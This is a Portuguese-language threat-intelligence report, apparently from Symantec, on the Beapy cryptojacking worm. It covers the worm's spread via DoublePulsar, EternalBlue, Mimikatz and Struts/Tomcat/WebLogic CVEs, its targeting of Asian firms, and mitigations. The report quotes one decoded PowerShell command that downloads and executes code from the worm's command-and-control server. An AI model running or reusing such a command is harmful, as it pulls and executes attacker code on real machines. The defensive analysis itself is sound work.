Beapy: worm de cryptojacking atinge empresas

Beapy é uma campanha de cryptojacking que afeta empresas, usando a exploração EternalBlue e credenciais roubadas e fixas para se espalhar rapidamente pelas redes. Atividades do Beapy foram detectadas pela primeira vez na telemetria da Symantec em janeiro de 2019. Essas atividades também foram encontradas em servidores web e estão aumentando desde o começo de março.

O Beapy (W32.Beapy) é um minerador baseado em arquivo que utiliza o e-mail como um vetor de infecção inicial. Essa campanha demonstra que, embora o cryptojacking tenha perdido popularidade entre os criminosos cibernéticos desde seu pico no começo de 2018, alguns deles ainda o têm como foco e agora as empresas são seu alvo principal.

Quase todas as vítimas do Beapy são empresas (Figura 1). O Beapy pode indicar a continuidade de uma tendência demonstrada pelo worm Bluwimps (MSH.Bluwimps) em 2018, que mencionamos no ISTR 24: um foco maior dos criminosos de cryptojacking contra empresas. Embora não tenhamos evidências de que esses ataques sejam direcionados, os recursos de worm do Beapy indicam que provavelmente a intenção sempre foi que ele se espalhasse por redes corporativas.

Figura 1. Infecções empresariais do Beapy comparadas às de consumidores

Isso reproduz uma tendência que também detectamos no ransomware em 2018, quando, apesar de uma queda de 20% no total de infecções de ransomware, as infecções em empresas aumentaram em 12%. Parece que as empresas são um foco crescente para os criminosos cibernéticos.

O Beapy está afetando fortemente empresas na Ásia, com mais de 80% das vítimas situadas na China e outras vítimas na Coreia do Sul, Japão e Vietnã.

Figura 2. Infecções do Beapy por região

Cadeia de infecção
E-mails maliciosos são o vetor inicial de pelo menos algumas infecções do Beapy. Um documento do Excel malicioso é entregue às vítimas como anexo de e-mail. Se o destinatário abrir o anexo malicioso, o backdoor DoublePulsar (Backdoor.Doublepulsar) será baixado para a máquina-alvo. O DoublePulsar, assim como o EternalBlue, foi vazado no dump do Shadow Brokers e também foi usado no destrutivo ataque de ransomware WannaCry em 2017. O DoublePulsar abre um backdoor nas máquinas infectadas e permite a execu ão remota de código em computadores comprometidos. O EternalBlue explora uma vulnerabilidade no protocolo SMB do Windows que permite que arquivos se espalhem lateralmente entre redes.

Com o DoublePulsar instalado, é executado um comando PowerShell e é feito contato com o servidor de comando e controle (C&C) do Beapy, antes que um minerador seja baixado para o computador-alvo. Examinando um exemplo de máquina na telemetria da Symantec, os primeiros sinais de atividades suspeitas foram identificados em 15 de fevereiro de 2019, quando o backdoor DoublePulsar foi detectado, e um comando PowerShell sendo executado, decodificado conforme o seguinte:

· IEX (New-Object Net.WebClient).downloadstring(‘http://v.beahh.com/v’+$env:USERDOMAIN)

Isso indica que o dispositivo entrando em contato com o servidor de C&C do Beapy. Mais alguns comandos PowerShell são executados e então é baixado um minerador. Esse processo se repete conforme o Beapy se espalha para outros computadores na rede.

Aparentemente o Beapy usa máquinas vulneráveis para ganhar terreno na rede, e então usa o EternalBlue para se espalhar para outras máquinas. No entanto, essa não é a única técnica de propagação do Beapy, pois ele também usa a ferramenta de roubo de credenciais Hacktool.Mimikatz para tentar coletar credenciais de computadores infectados. Ele pode usá-las para se espalha até mesmo para máquinas da rede que tenham recebido patches. O Beapy também usa uma lista fixa de nomes de usuário e senhas para tentar se espalhar entre redes. Essa operação é similar à do worm Bluwimps. Ele infectou milhares de máquinas empresariais com mineradores em 2017 e 2018.

Servidores web
A telemetria da Symantec também encontrou uma versão anterior do Beapy em um servidor web público; o worm tentava se espalhar para computadores conectados a esse servidor. Uma das formas com que ele aparentemente faz isso é gerando uma lista dos endereços IP que ele tenta infectar.

O Beapy encontrado no servidor web é uma versão mais antiga do malware, programada em C em vez do Python das versões mais recentes. Mas as atividades são similares; o malware baixado também contém módulos Mimikatz para coleta de credenciais, assim como os recursos de exploração EternalBlue.

No caso do comprometimento por servidor web, o Beapy também tentava explorar uma vulnerabilidade do Apache Struts (CVE-2017-5638). Essa vulnerabilidade foi corrigida em 2017, mas se explorada, pode permitir a execução remota de código. O Beapy também tentou explorar vulnerabilidades conhecidas no Apache Tomcat (CVE-2017-12615) e no Oracle WebLogic Server (CVE-2017-10271). No caso desse comprometimento por servidor web observado pela Symantec, as tentativas de exploração começaram no começo de fevereiro, com as conexões ao servidor C&C do Beapy observadas pela primeira vez em 13 de março. As atividades direcionadas a esse servidor web continuaram até o começo de abril.

No geral, as atividades do Beapy vêm aumentando desde o começo de março.

Figura 3. É evidente um aumento súbito nas detecções do Beapy

O que as atividades do Beapy indicam?
Apesar da queda de 52% nas atividades de cryptojacking em 2018, essa ainda é uma área de interesse para os criminosos cibernéticos. Examinando os dados gerais de cryptojacking, percebemos que houve quase 3 milhões de tentativas em março de 2019. Embora seja uma queda grande em relação ao pico de 8 milhões de tentativas de cryptojacking em fevereiro de 2018, ainda é um dado significativo.

Figura 4. Atividades de cryptojacking, janeiro de 2018 a março de 2019

O Beapy é um minerador baseado em arquivo, o que é interessante, pois a maior parte das atividades de cryptojacking detectadas no auge de sua popularidade era executada por mineradores baseados em navegador, uma opção popular devido às barreiras de entrada menores e por permitir que até mesmo máquinas com todos os patches fossem visadas. O anúncio de fechamento do serviço de mineração Coinhive, que havia sido lançado em setembro de 2017 e tinha tido um papel fundamental no crescimento do cryptojacking, provavelmente também contribuiu para a queda do cryptojacking baseado em navegador. O serviço, que facilitou muito para qualquer pessoa executar mineração baseada em navegador, encerrou suas operações no começo de março. É provável que o fechamento desse serviço tenha tido um impacto drástico no cryptojacking baseado em navegador.

Além desses fatores, os mineradores baseados em arquivo também têm uma vantagem significativa sobre os baseados em navegador por poderem minerar criptomoedas mais rapidamente. A criptomoeda Monero, que é a minerada com mais frequência em ataques de cryptojacking, caiu de valor em 90% em 2018; portanto, faz sentido que mineradores que possam gerar criptomoedas mais rapidamente sejam mais populares entre os criminosos cibernéticos.

Figura 5. Comparando a rentabilidade de botnets de mineração baseados em navegador com a dos baseados em arquivo

Efeitos do cryptojacking sobre as empresas
Embora as empresas achem que não precisam se preocupar tanto com o cryptojacking quanto com ameaças mais disruptivas como o ransomware, mesmo assim ele pode ter um grande impacto nas operações.

Os impactos em potencial do cryptojacking para as empresas incluem:
-Lentidão no desempenho de dispositivos, potencialmente causando frustração nos funcionários e perda de produtividade
-Baterias superaquecidas
-Degradação e inutilização dos dispositivos, causando aumento nos custos de TI
-Aumento de custos para empresas que operam na nuvem devido ao consumo maior de eletricidade e de uso de CPU

As empresas precisam garantir que suas redes fiquem protegidas contra toda a variedade de ameaças à segurança cibernética.

Mitigação
-Concentrar-se em sistemas defensivos múltiplos, sobrepostos e de suporte mútuo para se proteger contra falhas de ponto único em qualquer tecnologia ou método de proteção específico. Isso inclui a implantação de tecnologias de proteção de endpoint, e-mail e gateway web, além de firewalls e soluções de avaliação de vulnerabilidades. Manter essas soluções de segurança atualizadas com os recursos de proteção mais recentes.

-Educar os usuários que tenham acesso às máquinas e à rede, para que eles tenham cuidado com e-mails de origem desconhecida e ao abrir anexos não solicitados, que possam conter malware minerador baseado em arquivo.

-Educar os funcionários sobre os sinais que indicam que o computador pode estar com um minerador, e os instruir a informar a TI imediatamente se acharem que pode haver um minerador em um dispositivo na rede da empresa.

-Monitorar o consumo de bateria do seu dispositivo e, ao notar um pico suspeito, verificar a existência de mineradores baseados em arquivo.

-Instalar os patches mais recentes nos dispositivos, usar senhas fortes e ativar a autenticação de dois fatores.